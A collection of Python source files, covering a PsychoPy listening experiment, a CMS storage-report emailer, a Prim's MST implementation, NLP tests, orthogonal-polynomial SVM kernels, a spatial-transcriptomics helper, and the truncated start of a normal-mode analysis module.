+{"seq_id":"572857094","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom psychopy import core, clock, visual, event, sound\nimport csv, random\nimport my # import functions in my.py from psychopy tutorial\nimport os\nimport pandas as pd\n# import seaborn\nimport matplotlib.pyplot as plt\n\n\n## Setup Section\nwin = visual.Window(size=[800,600], fullscr=False, monitor=\"testMonitor\", units='cm')\nnumblocks = 5 # this is the number of blocks a participant will complete\nnumrepeatedtrials = 4 # this is the number of times each sound file will be played per block\n\ndef displayStimulus(stimulusname, recordtime=None, waittime=None, secondstim=None, sound=None):\n '''Basic function for presenting stimuli.\n stimulusname = The name of the stimulus created in the setup section\n recordtime (optional) = The name of the time you are recording (e.g., time image is presented is imgTime)\n waittime (optional) = Time to hold stimulus (i.e., stimulusname) on screen\n sound (optional) = Sound to play after stimulus becomes visible'''\n stimulusname.draw()\n if secondstim:\n secondstim.draw()\n win.flip()\n if recordtime:\n times[recordtime] = clock.getTime()\n if sound:\n sound.play()\n if waittime:\n core.wait(waittime)\n\n# read stimulus file into list of dicts, then shuffle\ntrials = []\nstimlist = my.getStimulusInputFileDict('stimuli.csv')\nfor i in range(0, numrepeatedtrials): # this adds repeated trials for a given block\n trials += stimlist\nrandom.shuffle(trials)\n\n#create lists/stimuli for stimulus elements\noption1 = [visual.TextStim(win, text=trial['Option1'] + '\\n\\n<==' , pos=(-8.0,0)) for trial in trials]\noption2 = [visual.TextStim(win, text=trial['Option2'] + '\\n\\n==>', pos=(8.0,0)) for trial in trials]\nsoundfile = [sound.Sound(value=\"stimuli/{}\".format(trial['Filename'])) for trial in trials]\n\n#feedback\nno_response = visual.TextStim(win, \"You did not respond within 6 seconds. Press the left arrow or right arrow to respond after the sound has played.\")\n\n#fixation cross\nfixation = visual.ShapeStim(win, \n vertices=((0, -0.5), (0, 0.5), (0,0), (-0.5,0), (0.5, 0)),\n lineWidth=5,\n closeShape=False,\n lineColor='white'\n)\n\nwelcomestr = (\"Welcome! For this experiment, choose which sound you hear. \"\n \"Use the left arrow key for \\\"{}\\\" and the right arrow key for \\\"{}\\\".\\n\\n\"\n \"There will be {} blocks of items with a break in between each one. \"\n \"Press any other key to begin. 
\")\n\ninterblockstr = (\"You will now begin Block {}.\\n\\n\"\n \"Press any key to continue.\")\n\n# create dictionaries to collect data about percentages\nsoundvalues = {stimdict['Value']:[0,0] for stimdict in stimlist}\n#print(soundvalues)\n\n# open data output file\ndirectory = \"result_data\" # This is where all of the output data will go\nppn = my.getString(win, \"Please enter a participant number:\")\ndatafile = my.openDataFile(ppn)\n# connect it with a csv writer\nwriter = csv.writer(datafile, delimiter=\",\")\n# create output file header\nwriter.writerow([\n \"Trial Number\", \n \"Sound Value\",\n \"Selection\",\n \"Filename\"\n ])\n \n## Experiment Section\n# show welcome screen\nmy.getCharacter(win, welcomestr.format(trials[0]['Option1'], trials[0]['Option2'], numblocks))\nstartTime = clock.getTime() # clock is in seconds\n\nblocknum = 0\ntrialnum = 0\nkey = []\nrandomseed = 0\nwhile blocknum < numblocks:\n for i in range(len(trials)):\n trial = trials[i]\n times = {}\n \n # Cue: present fixation for 100 ms\n displayStimulus(fixation, 'fixationTime', 0.100)\n \n # Delay: blank screen for 100 ms\n win.flip()\n times['blankTime'] = clock.getTime()\n core.wait(0.100)\n \n # Stimulus/Response: present stimulus image and wait up to 6 seconds or for a response of y, n, or Esc key\n displayStimulus(option1[i], recordtime='stimTime', secondstim=option2[i], sound=soundfile[i])\n key = event.waitKeys(6.000, ['left', 'right', 'escape'])\n times['responseTime'] = clock.getTime()\n \n # Anti-Startle: blank screen for 50 ms\n win.flip()\n times['antistartleTime'] = clock.getTime()\n core.wait(0.050)\n \n # collect data\n soundvalues[trial['Value']][1] += 1\n selection = \"\"\n if key:\n if key[0] == \"left\":\n # record selection\n selection = trial['Option1']\n # add data to soundvalues dict\n soundvalues[trial['Value']][0] += 1\n elif key[0] == \"right\":\n selection = trial['Option2']\n else:\n selection = \"escape\"\n else:\n selection = \"no response\"\n displayStimulus(no_response, waittime=1.000) # Included 1 sec for this part so users could see the instructions briefly\n \n # Inter-trial Interval: blank screen for 1000 ms\n win.flip()\n times['intertrialTime'] = clock.getTime()\n core.wait(1.000)\n \n # write result to data file\n if key==None:\n key=[]\n key.append(\"no key\")\n \n #print(\"sound: {}, blocknum: {}, key pressed: {}={}\".format(trial['Filename'], blocknum, key[0], selection))\n \n writer.writerow([\n trialnum,\n trial['Value'],\n selection,\n trial['Filename']\n ])\n \n trialnum += 1\n if key[0]=='escape':\n break\n blocknum += 1\n if key[0]=='escape':\n break\n # randomize subsequent blocks\n randomseed = random.random()\n random.seed(randomseed)\n random.shuffle(trials)\n random.seed(randomseed)\n random.shuffle(soundfile)\n # intermission screen\n if blocknum < numblocks:\n my.getCharacter(win, interblockstr.format(blocknum + 1))\ndatafile.close()\n\n# FINAL PERCENTAGES\n# open data output file\npercentages = my.openDataFile(ppn + \"_summary\")\n# connect it with a csv writer\nwriter = csv.writer(percentages, delimiter=\",\")\n# create output file header\nwriter.writerow([\n \"Sound Value\",\n \"Number Labeled {}\".format(trials[0]['Option1']),\n \"Total Seen\",\n \"Percent Labeled {}\".format(trials[0]['Option1'])\n ])\n \nfor keyvalue in sorted(soundvalues.keys()):\n writer.writerow([\n keyvalue,\n soundvalues[keyvalue][0],\n soundvalues[keyvalue][1],\n float(soundvalues[keyvalue][0])/float(soundvalues[keyvalue][1]) * 100 if soundvalues[keyvalue][1] > 0 else 0\n 
])\npercentages.close()\n\n# show goodbye screen\nmy.showText(win, \"Thank you for participating!\")\ncore.wait(2.000)\n\n## Closing Section\nwin.close()\n# create line graph\ninput = os.path.join(\"result_data\", \"ppn{}_summary_results.csv\".format(ppn))\noutput = os.path.join(\"result_data\", \"ppn{}_plot\".format(ppn))\ndf = pd.read_csv(input)\ngraph = df.plot(x=\"Sound Value\", y=\"Percent Labeled {}\".format(trials[0]['Option1']))\nfig = graph.get_figure()\nfig.savefig(output)\ncore.quit()","sub_path":"Identification Experiment/identification.py","file_name":"identification.py","file_ext":"py","file_size_in_byte":7029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
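The summary rows compute a per-value selection percentage with a divide-by-zero guard; the same calculation isolated on toy data:

```python
soundvalues = {"1": [3, 4], "2": [0, 0], "3": [4, 4]}  # value -> [chosen, seen]

for key in sorted(soundvalues):
    chosen, seen = soundvalues[key]
    percent = float(chosen) / float(seen) * 100 if seen > 0 else 0
    print(key, chosen, seen, "{:.1f}%".format(percent))
```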
+{"seq_id":"45269501","text":"#!/usr/bin/env python\n#---------------------------------------------------------------------------------------------------\n# Daily Report\n# Print: Total data owned\n# Percentage used storage\n# Data owned per site\n# Percentage used per site\n# Total data subscribed\n# Data subscribed per site\n#---------------------------------------------------------------------------------------------------\nimport sys, os, datetime, sqlite3, ConfigParser\nfrom operator import itemgetter\nfrom email.MIMEText import MIMEText\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.Utils import formataddr\nfrom subprocess import Popen, PIPE\nimport makeTable, sites\nimport dbApi, phedexData, popDbData\n\nclass dataDealerReport():\n def __init__(self):\n config = ConfigParser.RawConfigParser()\n config.read('/usr/local/IntelROCCS/DataDealer/intelroccs.cfg')\n self.rankingsCachePath = config.get('DataDealer', 'cache')\n self.reportPath = config.get('DataDealer', 'report_path')\n self.phedexData = phedexData.phedexData()\n self.popDbData = popDbData.popDbData()\n self.dbApi = dbApi.dbApi()\n self.sites = sites.sites()\n\n def _toStr(self, toList):\n names = [formataddr(i) for i in zip(*toList)]\n return ', '.join(names)\n\n def sendReport(self, title, text):\n # Send email\n fromEmail = (\"Bjorn Barrefors\", \"bjorn.peter.barrefors@cern.ch\")\n #toList = ([\"Bjorn Barrefors\"], [\"bjorn.peter.barrefors@cern.ch\"])\n toList = ([\"Bjorn Barrefors\"], [\"barrefors@gmail.com\"])\n #toList = ([\"Data Management Group\"], [\"hn-cms-dmDevelopment@cern.ch\"])\n #toList = ([\"Bjorn Barrefors\", \"Brian Bockelman\", \"Maxim Goncharov\", \"Christoph Paus\"],\n # [\"bjorn.peter.barrefors@cern.ch\", \"bbockelm@cse.unl.edu\", \"maxi@mit.edu\", \"paus@mit.edu\"])\n\n msg = MIMEMultipart()\n msg['Subject'] = title\n msg['From'] = formataddr(fromEmail)\n msg['To'] = self._toStr(toList)\n msg1 = MIMEMultipart(\"alternative\")\n msgText1 = MIMEText(\"%s \" % text, \"html\")\n msgText2 = MIMEText(text)\n msg1.attach(msgText2)\n msg1.attach(msgText1)\n msg.attach(msg1)\n msg = msg.as_string()\n p = Popen([\"/usr/sbin/sendmail\", \"-toi\"], stdin=PIPE)\n p.communicate(msg)\n\n def createReport(self):\n # Initialize\n date = datetime.date.today()\n cacheFile = \"%s/%s.db\" % (self.rankingsCachePath, \"rankingsCache\")\n rankingsCache = sqlite3.connect(cacheFile)\n\n # Get all sites with data usage, quota, and rank\n allSites = self.sites.getAllSites()\n blacklistedSites = self.sites.getBlacklistedSites()\n siteQuota = dict()\n for site in allSites:\n query = \"SELECT Quotas.SizeTb FROM Quotas INNER JOIN Sites ON Quotas.SiteId=Sites.SiteId INNER JOIN Groups ON Groups.GroupId=Quotas.GroupId WHERE Sites.SiteName=%s AND Groups.GroupName=%s\"\n values = [site, \"AnalysisOps\"]\n data = self.dbApi.dbQuery(query, values=values)\n quota= data[0][0]\n usedStorage = self.phedexData.getSiteStorage(site)\n with rankingsCache:\n cur = rankingsCache.cursor()\n cur.execute('SELECT Rank FROM Sites WHERE SiteName=?', (site,))\n row = cur.fetchone()\n if not row:\n rank = 0\n else:\n rank = row[0]\n siteQuota[site] = (quota, usedStorage, rank)\n\n # Get all subscriptions\n subscriptions = []\n query = \"SELECT Datasets.DatasetName, Sites.SiteName, Requests.Rank FROM Requests INNER JOIN Datasets ON Datasets.DatasetId=Requests.DatasetId INNER JOIN Sites ON Sites.SiteId=Requests.SiteId WHERE Requests.Date>%s AND Requests.RequestType=%s\"\n values = [date.strftime('%Y-%m-%d %H:%M:%S'), 0]\n data = 
self.dbApi.dbQuery(query, values=values)\n for sub in data:\n subscriptions.append([info for info in sub])\n subscriptions.sort(reverse=True, key=itemgetter(2))\n\n # Get top 10 datasets not subscribed\n cacheFile = \"%s/%s.db\" % (self.rankingsCachePath, \"rankingsCache\")\n nSubbed = len(subscriptions)\n topTen = []\n with rankingsCache:\n cur = rankingsCache.cursor()\n cur.execute('SELECT * FROM Datasets ORDER BY Rank DESC LIMIT ? OFFSET ?', (nSubbed+10, nSubbed))\n for row in cur:\n topTen.append(row)\n\n # Make title variables\n quota = 0.0\n dataOwned = 0.0\n for site, value in siteQuota.items():\n if not (site in blacklistedSites):\n quota += value[0]\n dataOwned += value[1]\n quotaUsed = int(100*(float(dataOwned)/float(quota*10**3)))\n dataSubscribed = 0.0\n siteSubscriptions = dict()\n for site in allSites:\n siteSubscriptions[site] = 0.0\n for subscription in subscriptions:\n subscriptionSize = self.phedexData.getDatasetSize(subscription[0])\n dataSubscribed += subscriptionSize\n site = subscription[1]\n siteSubscriptions[site] += subscriptionSize\n\n # Create title\n title = 'AnalysisOps %s | %d TB | %d%% | %.2f TB Subscribed' % (date.strftime('%Y-%m-%d'), int(dataOwned/10**3), int(quotaUsed), int(dataSubscribed/10**3))\n text = '%s\\n %s\\n%s\\n\\n' % ('='*68, title, '='*68)\n\n # Create site table\n # get status of sites\n siteTable = makeTable.Table(add_numbers=False)\n siteTable.setHeaders(['Site', 'Subscribed TB', 'Space Used TB', 'Space Used %', 'Quota TB', 'Rank', 'Status'])\n for site in allSites:\n subscribed = float(siteSubscriptions[site])/(10**3)\n quota = siteQuota[site][0]\n usedTb = int(siteQuota[site][1]/10**3)\n usedP = \"%d%%\" % (int(100*(float(usedTb)/float(quota))))\n status = \"up\"\n rank = float(siteQuota[site][2])\n if site in blacklistedSites:\n status = \"down\"\n siteTable.addRow([site, subscribed, usedTb, usedP, quota, rank, status])\n\n text += siteTable.plainText()\n\n # create subscription table\n text += \"\\n\\nNew Subscriptions\\n\\n\"\n\n subscriptionTable = makeTable.Table(add_numbers=False)\n subscriptionTable.setHeaders(['Rank', 'Size GB', 'Replicas', 'CPU Hours', 'Dataset'])\n for subscription in subscriptions:\n dataset = subscription[0]\n rank = float(subscription[2])\n size = self.phedexData.getDatasetSize(dataset)\n replicas = int(self.phedexData.getNumberReplicas(dataset))\n cpuH = int(self.popDbData.getDatasetCpus(dataset, (datetime.date.today() - datetime.timedelta(days=1)).strftime('%Y-%m-%d')))\n subscriptionTable.addRow([rank, size, replicas, cpuH, dataset])\n\n text += subscriptionTable.plainText()\n\n # create top ten datasets not subscribed table\n text += \"\\n\\nTop Ten Datasets Not Subscribed\\n\\n\"\n\n topTenTable = makeTable.Table(add_numbers=False)\n topTenTable.setHeaders(['Rank', 'Size GB', 'Replicas', 'CPU Hours', 'Dataset'])\n for dataset in topTen:\n datasetName = dataset[0]\n rank = float(dataset[1])\n size = self.phedexData.getDatasetSize(datasetName)\n replicas = int(self.phedexData.getNumberReplicas(datasetName))\n cpuH = int(self.popDbData.getDatasetCpus(datasetName, (datetime.date.today() - datetime.timedelta(days=1)).strftime('%Y-%m-%d')))\n topTenTable.addRow([rank, size, replicas, cpuH, datasetName])\n\n text += topTenTable.plainText()\n\n fs = open('%s/data_dealer-%s.report' % (self.reportPath, date.strftime('%Y%m%d')), 'w')\n fs.write(text)\n fs.close()\n\n text = 
\"http://t3serv001.mit.edu/~cmsprod/IntelROCCS/DataDealer/Logs/data_dealer-latest.log\\n\\nhttp://t3serv001.mit.edu/~cmsprod/IntelROCCS/DataDealer/Reports/data_dealer-latest.report\"\n\n self.sendReport(title, text)\n\nif __name__ == '__main__':\n dataDealerReport()\n sys.exit(0)\n","sub_path":"DataDealer/src/dataDealerReport.py","file_name":"dataDealerReport.py","file_ext":"py","file_size_in_byte":8189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"278884692","text":"import sys # Library for INT_MAX\n\nimport random\n\n\nfrom graph_reader import *\nfrom graph_adt_list import *\n\n# class Graph():\n#\n# def __init__(self, vertices):\n# self.V = vertices\n# self.graph = [[0 for column in range(vertices)]\n# for row in range(vertices)]\n#\n# # A utility function to print the constructed MST stored in parent[]\n# def printMST(self, parent):\n# print \"Edge \\tWeight\"\n# for i in range(1, self.V):\n# print parent[i], \"-\", i, \"\\t\", self.graph[i][ parent[i] ]\n#\n# # A utility function to find the vertex with\n# # minimum distance value, from the set of vertices\n# # not yet included in shortest path tree\n# def minKey(self, key, mstSet):\n#\n# # Initilaize min value\n# min = sys.maxint\n#\n# for v in range(self.V):\n# if key[v] < min and mstSet[v] == False:\n# min = key[v]\n# min_index = v\n#\n# return min_index\n\n # Function to construct and print MST for a graph\n # represented using adjacency matrix representation\n# def primMST(graph):\n#\n# visited = []\n# unvisited = []\n#\n# i = 1\n#\n# for v in graph.vertices:\n# unvisited.append(v) # appending the linkedlist object\n#\n# # choose a random index\n# index = random.randint(0, graph.numberOfVertices-i)\n#\n# # print(index)\n#\n# visited.append(unvisited.pop(index).id)\n#\n# while unvisited:\n#\n\n#\n# edges = graph.vertices[index].getEdges()\n#\n# lowest = float('inf')\n# lowest_vert = None\n#\n# if isinstance(edges, list): # if more than one edge..\n# for edge in edges:\n# if edge[1] not in visited:\n# temp = lowest\n# lowest = min(edge[2], lowest)\n# if temp != lowest:\n# lowest_vert = edge[1]\n# else: # if just one edge..\n# if edges[1] not in visited:\n# temp = lowest\n# lowest = min(edges[2], lowest)\n# if temp != lowest:\n# lowest_vert = edges[1]\n#\n# for i, v in enumerate(unvisited):\n# if v.id == lowest_vert:\n# visited.append(unvisited.pop(i).id)\n#\n# i+=1\n#\n# else:\n# return visited\n\ndef primMST(graph,edges):\n \"\"\"If it's a digraph all vertices must be represented\n in both to_vert and from_vert positions in:\n [to_vert, from_vert, weight]\n \"\"\"\n\n # choose a random index\n index = random.randint(0, graph.numberOfVertices-1)\n vertex = int(graph.vertices[index].id)\n\n MST = []\n visited = []\n minEdge = [None,None,float('inf')] # [to_vert, from_vert, weight]\n\n minEdge_index = 0\n\n # number of edges in a minimum spanning tree is graph.numberOfVertices-1\n while len(MST) < graph.numberOfVertices-1:\n\n visited.append(vertex) # append the new vertex to the visited array\n\n for i, edge in enumerate(edges):\n if edge[2] < minEdge[2] and edge[1] not in visited and edge[0] in visited and edge[0] != edge[1]:\n minEdge = edge\n minEdge_index = i\n\n edges.pop(minEdge_index)\n\n MST.append(minEdge)\n\n vertex = minEdge[1]\n minEdge = [None,None,float('inf')]\n\n return MST\n\n\nif __name__ == \"__main__\":\n\n filePath = \"graph_data.txt\"\n vertices, edges = readGraph(filePath)\n\n graph = LLGraph(vertices)\n graph.addEdges(edges)\n\n print(primMST(graph, edges))\n","sub_path":"MST_play/prims.py","file_name":"prims.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"255403243","text":"from nose.tools import assert_equal, assert_less, assert_true\nfrom unittest import skip, SkipTest\n\nfrom xtas.tasks import movie_review_polarity, stanford_ner_tag, tokenize\n\n\ndef test_movie_review_polarity():\n try:\n import sklearn\n except ImportError:\n raise SkipTest(\"movie review classifier requires scikit-learn\")\n\n # <.5 == probably not positive.\n assert_less(movie_review_polarity(\"This movie sucks.\"), .5)\n\n\ndef test_tokenize():\n tokens = tokenize(\"My hovercraft is full of eels.\")\n expected = \"My hovercraft is full of eels .\".split()\n for obs, exp in zip(tokens, expected):\n assert_equal(obs, {\"token\": exp})\n\n\ndef test_stanford_ner():\n # From Wikipedia front page, 10 Feb 2014.\n phrase = (\"Academy Award-winning actor Philip Seymour Hoffman\"\n \" dies at the age of 46.\")\n\n ne = stanford_ner_tag(phrase)\n for token, tag in ne:\n assert_true(isinstance(token, basestring))\n assert_true(tag in [\"O\", \"PERSON\"])\n\n names = stanford_ner_tag(phrase, format=\"names\")\n # Stanford doesn't pick up \"Academy Award\". This is not our fault.\n # (XXX divise a better test.)\n assert_equal(names, [(\"Philip Seymour Hoffman\", \"PERSON\")])\n","sub_path":"tests/test_single.py","file_name":"test_single.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"423207196","text":"\"\"\"\nCreated on Fri Dec 13 14:24:06 2019\n@author: Carlos Padierna\n\"\"\"\n#import numpy as np, matplotlib.pyplot as plt\nfrom numpy import zeros, array, exp, tanh, sqrt, power\nfrom sklearn.metrics.pairwise import check_pairwise_arrays, euclidean_distances\nfrom sklearn.utils.extmath import safe_sparse_dot\n#from numba import njit\n\"\"\"\nParameters\n ----------\n X : ndarray of shape (n_samples_1, n_features)\n Y : ndarray of shape (n_samples_2, n_features)\n\n degree : int, default 3\n gamma : float, default None\n if None, defaults to 1.0 / n_features\n\n coef0 : float, default 1\n\"\"\"\ndef build_K_Linear():\n def K_linear(X, Y=None): \n print('**K_linear**')\n X, Y = check_pairwise_arrays(X, Y) \n K = zeros((X.shape[0],Y.shape[0]))\n \n if X is Y: #fit-> La gramiana K es simétrica\n for i,x in enumerate(X):\n for j,z in enumerate(Y): \n K[i][j] = K[j][i] = x @ z\n if j > i:\n break\n else: #predict-> K NO es simétrica, es K\n return X @ Y.T\n #for i,x in enumerate(X):\n # for j,z in enumerate(Y): \n # K[i][j] = x@z\n \n return K\n return K_linear\n\ndef my_linear(X, Y=None, dense_output=True): \n print('**K_linear**')\n X, Y = check_pairwise_arrays(X, Y)\n #return X@Y.T\n return safe_sparse_dot(X, Y.T, dense_output=dense_output)\n\ndef build_K_sHerm(degree):\n def K_sHerm(X, Y=None): \n print('**K_sHerm, degree=: **',str(degree))\n X, Y = check_pairwise_arrays(X, Y) \n K = zeros((X.shape[0],Y.shape[0]))\n \n if X is Y: #fit-> La gramiana K es simétrica\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += H(x[i],k) * H(z[i],k) / (2**(2*degree))\n mult *= summ \n K[l][m] = K[m][l] = mult\n if m > l:\n break\n else: #predict-> K NO es simétrica, es K\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += H(x[i],k) * H(z[i],k) / (2**(2*degree))\n mult *= summ \n K[l][m] = mult\n \n return array(K)\n return K_sHerm\n\n# HERMITE POLYNOMIALS\n# *******************************************\ndef H(x_i,n): \n if(n == 0):\n return 1\n if(n == 1):\n return x_i\n return (x_i * H(x_i,n-1) - (n-1) * H(x_i, n-2))\n\ndef build_K_gegen(degree,a):\n def K_gegen(X, Y=None): \n print('**K_gegen, degree=: **',str(degree),' alpha= ',str(a))\n X, Y = check_pairwise_arrays(X, Y) \n K = zeros((X.shape[0],Y.shape[0]))\n \n if X is Y: #fit-> La gramiana K es simétrica\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += G(x[i],k,a) * G(z[i],k,a) * w(x[i], z[i],a,k)\n mult *= summ \n K[l][m] = K[m][l] = mult\n if m > l:\n break\n else: #predict-> K NO es simétrica, es K\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += G(x[i],k,a) * G(z[i],k,a) * w(x[i], z[i],a,k)\n mult *= summ \n K[l][m] = mult\n \n return array(K)\n return K_gegen\n\n# GEGENBAUER POLYNOMIALS\n# *******************************************\n# Ref: https://www.mathworks.com/help/symbolic/gegenbauerc.html#bueod6o-2\ndef G(x_i,n,a): \n if(a == -0.5): #######2020.03.09 REVISAR a==0 o a==-0.5\n return T(x_i,n)\n if(n == 0):\n return 1\n if(n == 1):\n return 2.0*a*x_i\n return (1.0 / (n+1.0)) * ( 
(2.0*(n+a))* x_i * G(x_i,n-1,a) - (n+2.0*a-1) * G(x_i,n-2,a) )\n \ndef w(x,y,a,n):\n if (a <= 0): #######2020.03.09 REVISAR a<=0 o a<=0.5\n return 1\n else:\n iNC = pochhamer(2*a+1,n) / pochhamer(1,n)\n iNC = 1E-10 if iNC == 0 else 1/(iNC**2)\n return iNC * ( power((1-x*x)*(1-y*y),a) + 0.1) / (n+1) #######2020.03.09 REVISAR a o a-0.5\n\ndef pochhamer(x,k):\n if k==0:\n return 1.0\n if k < 0:\n return 0.0\n if x == 0:\n return 0.0\n aux = 1.0\n for i in range(0,k):\n aux *= (x+i)\n return aux\n\ndef gegenbauerc(x, n, a):\n\n first_value = 1.0\n second_value = 2.0 * a * x\n\n if n == 0:\n return first_value\n elif n == 1:\n return second_value\n else:\n result = 0.0\n\n for i in range(2, n + 1):\n result = 2.0 * x * (i + a - 1.0) * second_value - (\n (i + 2.0 * a - 2.0) * first_value\n )\n result /= i\n\n first_value = second_value\n second_value = result\n return result\n\ndef build_K_cheb(degree):\n def K_cheb(X, Y=None): \n #print('**K_sHerm, degree=: **',str(degree))\n X, Y = check_pairwise_arrays(X, Y) \n K = zeros((X.shape[0],Y.shape[0]))\n \n if X is Y: #fit-> La gramiana K es simétrica\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += T(x[i],k) * T(z[i],k)\n mult *= summ / sqrt(1.0001-x[i]*z[i]) \n K[l][m] = K[m][l] = mult\n if m > l:\n break\n else: #predict-> K NO es simétrica, es K\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += T(x[i],k) * T(z[i],k)\n mult *= summ / sqrt(1.0001-x[i]*z[i]) \n K[l][m] = mult\n return array(K)\n return K_cheb\n\n# CHEBYSHEV POLYNOMIALS\n# *******************************************\ndef T(x_i,n): \n if(n == 0):\n return 1\n if(n == 1):\n return x_i\n return (2 * x_i * T(x_i,n-1) - T(x_i, n-2))\n\ndef build_K_rbf(gamma):\n def my_rbf(X, Y=None):\n \"\"\" K(x, y) = exp(-gamma ||x-y||^2)\n Returns kernel_matrix : array of shape (n_samples_X, n_samples_Y) \"\"\"\n X, Y = check_pairwise_arrays(X, Y)\n \n #if gamma is None:\n # gamma = 1.0 / X.shape[1]\n \n K = euclidean_distances(X, Y, squared=True)\n K *= -gamma\n exp(K, K) # exponentiate K in-place\n return K\n return my_rbf\n\n\ndef polynomial_kernel(X, Y=None, degree=3, gamma=None, coef0=1):\n \"\"\" K(X, Y) = (gamma + coef0)^degree \n Returns Gram matrix : array of shape (n_samples_1, n_samples_2) \"\"\"\n X, Y = check_pairwise_arrays(X, Y)\n if gamma is None:\n gamma = 1.0 / X.shape[1]\n\n K = safe_sparse_dot(X, Y.T, dense_output=True)\n K *= gamma\n K += coef0\n K **= degree\n return K\n\ndef sigmoid_kernel(X, Y=None, gamma=None, coef0=1):\n \"\"\" K(X, Y) = tanh(gamma + coef0)\n Returns Gram matrix : array of shape (n_samples_1, n_samples_2)\"\"\"\n X, Y = check_pairwise_arrays(X, Y)\n if gamma is None:\n gamma = 1.0 / X.shape[1]\n\n K = safe_sparse_dot(X, Y.T, dense_output=True)\n K *= gamma\n K += coef0\n tanh(K, K) # compute tanh in-place\n return K\n\n#def test_K_sHerm():\n #\"\"\"MUESTRA POLINOMIOS DE S-HERMITE PARA VALIDAR LA H(x_i,n) ESCALADA\"\"\"\n #plt.figure()\n #t = np.arange(-1,1.1,.1) #Rango de prueba\n #for i in range(1,6):\n #plt.plot(t, H(t,i)*2**(-i), label = 'Grado '+str(i))\n #plt.legend()\n #plt.title(\"Polinomios Ortogonales de 
s-Hermite\")","sub_path":"padaux/orthogonal_kernels.py","file_name":"orthogonal_kernels.py","file_ext":"py","file_size_in_byte":9189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
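The Chebyshev helper `T()` in the record above implements the standard three-term recurrence T_n(x) = 2x·T_{n-1}(x) − T_{n-2}(x). It can be sanity-checked against numpy's reference implementation; a minimal check, assuming only that numpy is installed:

```python
import numpy as np
from numpy.polynomial import chebyshev

def T(x, n):
    # same three-term recurrence as the T() helper above
    if n == 0:
        return 1.0
    if n == 1:
        return x
    return 2.0 * x * T(x, n - 1) - T(x, n - 2)

x = 0.3
for n in range(6):
    # a coefficient vector with a single 1 in position n selects T_n
    reference = chebyshev.chebval(x, [0.0] * n + [1.0])
    assert np.isclose(T(x, n), reference)
```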
+{"seq_id":"94215727","text":"import numpy as np\n\nfrom ._spatial_knn import spatial_knn\nfrom .filtering import filter_genes\n\n\ndef select_slide(adata, s, batch_key=\"sample\"):\n r\"\"\"This function selects the data for one slide from the spatial anndata object.\n\n :param adata: Anndata object with multiple spatial experiments\n :param s: name of selected experiment\n :param batch_key: column in adata.obs listing experiment name for each location\n \"\"\"\n\n slide = adata[adata.obs[batch_key].isin([s]), :].copy()\n s_keys = list(slide.uns[\"spatial\"].keys())\n s_spatial = np.array(s_keys)[[s in k for k in s_keys]][0]\n\n slide.uns[\"spatial\"] = {s_spatial: slide.uns[\"spatial\"][s_spatial]}\n\n return slide\n\n\n__all__ = [\n \"select_slide\",\n \"filter_genes\",\n \"spatial_knn\",\n]\n","sub_path":"cell2location/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"214869004","text":"# DESCRIPTION: core module for computing normal modes for WEBnma v3\n# AUTHOR: dandan.xue@uib.no\n# DATE: Feb, 2019\nfrom __future__ import absolute_import\nfrom os.path import join, basename\n\nimport numpy as np\nfrom scipy.linalg import eigh\nfrom scipy.sparse.linalg import eigsh \nfrom scipy.spatial.distance import cdist\n\nfrom utils.pdb import read_pdb\nfrom utils.residue_mass import RES_MASS\nfrom utils.modefiles import write_modefile\nfrom config import MODE_NM\n\n\n# Note for diagonalization:\n# eigh: \n# Solve an ordinary or generalized eigenvalue problem for a complex\n# Hermitian or real symmetric matrix.(use LAPACK?)\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.linalg.eigh.html\n#\n# eigsh:\n# Find k eigenvalues and eigenvectors of the real symmetric square\n# matrix or complex hermitian matrix A.(use ARPACK)\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.linalg.eigsh.html\n\n\n# for konrad's model\nCONST_A = 8.6e5\nCONST_B = 2.39e5\nCONST_C = 1.28e2\nCONST_D = 0.4 # = 4 angstrom\n\n\ndef konrad_force_cons(diss):\n n = diss.shape[0] \n ks = np.zeros(diss.shape)\n for i in range(n):\n for j in range(i):\n r = diss[i,j]\n if r < CONST_D: \n ks[i,j] = CONST_A * r - CONST_B\n else:\n ks[i,j] = CONST_C * r**(-6)\n ks[j,i] = ks[i,j]\n return ks\n\n\ndef Hij(i,j,d,k):\n r_0 = j - i\n r_0 = r_0.reshape((1,3))\n hij = - k/(d**2) * (r_0 * r_0.transpose())\n return hij\n\n \ndef build_H(CAs, ks, diss, mass):\n n = CAs.shape[0]\n h = np.zeros((n,n,3,3))\n H = np.zeros((3*n, 3*n))\n\n for i in range(n):\n for j in range(i):\n 